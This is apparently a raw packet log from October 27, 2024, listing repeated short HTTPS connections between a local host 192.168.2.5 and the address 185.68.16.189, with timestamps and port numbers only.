                                                                                                                                                                                                      Oct 27, 2024 07:35:10.499279022 CET44349710185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:10.499370098 CET49710443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:10.499861956 CET49710443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:10.499878883 CET44349710185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:11.289294004 CET44349709185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:11.289499044 CET49709443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:11.290108919 CET49709443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:11.290115118 CET44349709185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:11.290365934 CET49709443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:11.290371895 CET44349709185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:11.399630070 CET44349710185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:11.399713993 CET49710443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:11.400360107 CET49710443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:11.400367022 CET44349710185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:11.400569916 CET49710443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:11.400574923 CET44349710185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:11.567635059 CET44349709185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:11.567708015 CET49709443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:11.567723989 CET44349709185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:11.567783117 CET49709443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:11.567787886 CET44349709185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:11.567852020 CET44349709185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:11.568047047 CET49709443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:11.568167925 CET49709443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:11.568943977 CET49709443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:11.568979979 CET44349709185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:11.570954084 CET49711443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:11.570967913 CET44349711185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:11.571033001 CET49711443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:11.572355986 CET49711443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:11.572375059 CET44349711185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:11.674599886 CET44349710185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:11.674705029 CET49710443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:11.674721003 CET44349710185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:11.674742937 CET44349710185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:11.674910069 CET49710443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:11.674910069 CET49710443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:11.675753117 CET49710443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:11.675762892 CET44349710185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:11.677001953 CET49712443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:11.677012920 CET44349712185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:11.677253962 CET49712443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:11.677529097 CET49712443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:11.677560091 CET44349712185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:12.465346098 CET44349711185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:12.465536118 CET49711443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:12.465979099 CET49711443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:12.465985060 CET44349711185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:12.466193914 CET49711443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:12.466198921 CET44349711185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:12.572630882 CET44349712185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:12.572719097 CET49712443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:12.573719025 CET49712443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:12.573729992 CET44349712185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:12.574074030 CET49712443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:12.574094057 CET44349712185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:12.739023924 CET44349711185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:12.739058018 CET44349711185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:12.739125967 CET44349711185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:12.739212990 CET49711443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:12.739276886 CET49711443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:12.740149021 CET49711443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:12.740161896 CET44349711185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:12.797636986 CET49713443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:12.797652006 CET44349713185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:12.797753096 CET49713443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:12.797955036 CET49713443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:12.797966957 CET44349713185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:12.844522953 CET44349712185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:12.844633102 CET49712443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:12.844656944 CET44349712185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:12.844696045 CET44349712185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:12.844717979 CET49712443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:12.844780922 CET49712443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:12.845364094 CET49712443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:12.845372915 CET44349712185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:12.845844984 CET49714443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:12.845858097 CET44349714185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:12.845962048 CET49714443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:12.846076965 CET49714443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:12.846091032 CET44349714185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:13.701637030 CET44349713185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:13.701740980 CET49713443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:13.702568054 CET49713443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:13.702578068 CET44349713185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:13.702943087 CET49713443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:13.702950954 CET44349713185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:13.741498947 CET44349714185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:13.741580009 CET49714443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:13.742046118 CET49714443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:13.742058039 CET44349714185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:13.742155075 CET49714443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:13.742158890 CET44349714185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:13.976454020 CET44349713185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:13.976514101 CET44349713185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:13.976634026 CET49713443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:13.976634026 CET49713443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:13.976644039 CET44349713185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:13.976725101 CET49713443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:13.978039980 CET49713443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:13.978049994 CET44349713185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:13.978640079 CET49715443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:13.978662968 CET44349715185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:13.978743076 CET49715443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:13.979017019 CET49715443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:13.979036093 CET44349715185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:14.014426947 CET44349714185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:14.014573097 CET44349714185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:14.014595985 CET49714443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:14.014780045 CET49714443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:14.015485048 CET49714443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:14.015492916 CET44349714185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:14.015985012 CET49716443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:14.016000032 CET44349716185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:14.016288996 CET49716443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:14.016428947 CET49716443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:14.016442060 CET44349716185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:14.888128042 CET44349715185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:14.888228893 CET49715443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:14.889071941 CET49715443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:14.889081955 CET44349715185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:14.889244080 CET49715443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:14.889251947 CET44349715185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:14.926419020 CET44349716185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:14.926573992 CET49716443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:14.926938057 CET49716443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:14.926959991 CET44349716185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:14.927010059 CET49716443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:14.927018881 CET44349716185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:15.166120052 CET44349715185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:15.166163921 CET44349715185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:15.166219950 CET44349715185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:15.166219950 CET49715443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:15.166219950 CET49715443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:15.166335106 CET49715443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:15.167823076 CET49715443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:15.167834044 CET44349715185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:15.168268919 CET49717443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:15.168287039 CET44349717185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:15.168350935 CET49717443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:15.168611050 CET49717443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:15.168626070 CET44349717185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:15.202649117 CET44349716185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:15.202712059 CET44349716185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:15.202795029 CET44349716185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:15.202805042 CET49716443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:15.202805042 CET49716443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:15.202835083 CET44349716185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:15.202852964 CET49716443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:15.202856064 CET44349716185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:15.202864885 CET49716443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:15.202903986 CET49716443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:15.204179049 CET49716443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:15.204191923 CET44349716185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:15.204674006 CET49718443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:15.204687119 CET44349718185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:15.204791069 CET49718443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:15.204927921 CET49718443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:15.204941988 CET44349718185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:16.051985979 CET44349717185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:16.052311897 CET49717443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:16.056977987 CET49717443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:16.056984901 CET44349717185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:16.057449102 CET49717443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:16.057455063 CET44349717185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:16.100287914 CET44349718185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:16.100375891 CET49718443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:16.100832939 CET49718443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:16.100841045 CET44349718185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:16.101133108 CET49718443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:16.101142883 CET44349718185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:16.331695080 CET44349717185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:16.331728935 CET44349717185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:16.331779957 CET44349717185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:16.331810951 CET49717443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:16.331866026 CET49717443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:16.331866026 CET49717443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:16.332771063 CET49717443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:16.332840919 CET44349717185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:16.333338976 CET49720443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:16.333350897 CET44349720185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:16.333445072 CET49720443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:16.333673954 CET49720443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:16.333693027 CET44349720185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:16.373682976 CET44349718185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:16.373716116 CET44349718185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:16.373779058 CET44349718185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:16.373792887 CET44349718185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:16.373857975 CET49718443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:16.373881102 CET49718443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:16.375441074 CET49718443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:16.375459909 CET44349718185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:16.384267092 CET49721443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:16.384280920 CET44349721185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:16.384361029 CET49721443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:16.384994984 CET49721443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:16.385013103 CET44349721185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:17.235568047 CET44349720185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:17.235688925 CET49720443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:17.236161947 CET49720443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:17.236172915 CET44349720185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:17.236397028 CET49720443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:17.236403942 CET44349720185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:17.277645111 CET44349721185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:17.277740002 CET49721443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:17.278067112 CET49721443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:17.278074980 CET44349721185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:17.278203964 CET49721443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:17.278213024 CET44349721185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:17.511435032 CET44349720185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:17.511456966 CET44349720185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:17.511514902 CET44349720185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:17.511725903 CET49720443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:17.512516975 CET49720443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:17.512530088 CET44349720185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:17.513206005 CET49723443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:17.513238907 CET44349723185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:17.513314962 CET49723443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:17.513585091 CET49723443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:17.513611078 CET44349723185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:17.549676895 CET44349721185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:17.549799919 CET44349721185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:17.549896002 CET49721443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:17.550513983 CET49721443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:17.550523043 CET44349721185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:17.551067114 CET49724443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:17.551084995 CET44349724185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:17.551145077 CET49724443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:17.551520109 CET49724443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:17.551547050 CET44349724185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:18.415539026 CET44349723185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:18.415786982 CET49723443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:18.416255951 CET49723443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:18.416318893 CET44349723185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:18.416469097 CET49723443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:18.416484118 CET44349723185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:18.454762936 CET44349724185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:18.454898119 CET49724443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:18.455704927 CET49724443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:18.455735922 CET44349724185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:18.455975056 CET49724443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:18.455986023 CET44349724185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:18.691761971 CET44349723185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:18.691967010 CET44349723185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:18.692101002 CET49723443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:18.692137003 CET49723443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:18.693538904 CET49723443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:18.693547964 CET44349723185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:18.695461035 CET49726443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:18.695477009 CET44349726185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:18.695669889 CET49726443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:18.696095943 CET49726443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:18.696116924 CET44349726185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:18.730302095 CET44349724185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:18.730360031 CET44349724185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:18.730427027 CET49724443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:18.730427027 CET49724443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:18.730441093 CET44349724185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:18.730494976 CET44349724185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:18.730863094 CET49724443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:18.731537104 CET49724443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:18.731547117 CET44349724185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:18.732676029 CET49727443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:18.732695103 CET44349727185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:18.732889891 CET49727443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:18.733258009 CET49727443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:18.733274937 CET44349727185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:19.639064074 CET44349726185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:19.639118910 CET49726443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:19.640045881 CET49726443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:19.640058041 CET44349726185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:19.640384912 CET49726443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:19.640392065 CET44349726185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:19.642153025 CET44349727185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:19.642306089 CET49727443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:19.642605066 CET49727443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:19.642616987 CET44349727185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:19.642786980 CET49727443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:19.642796040 CET44349727185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:19.912619114 CET44349726185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:19.912703991 CET44349726185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:19.912717104 CET49726443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:19.912792921 CET49726443192.168.2.5185.68.16.189
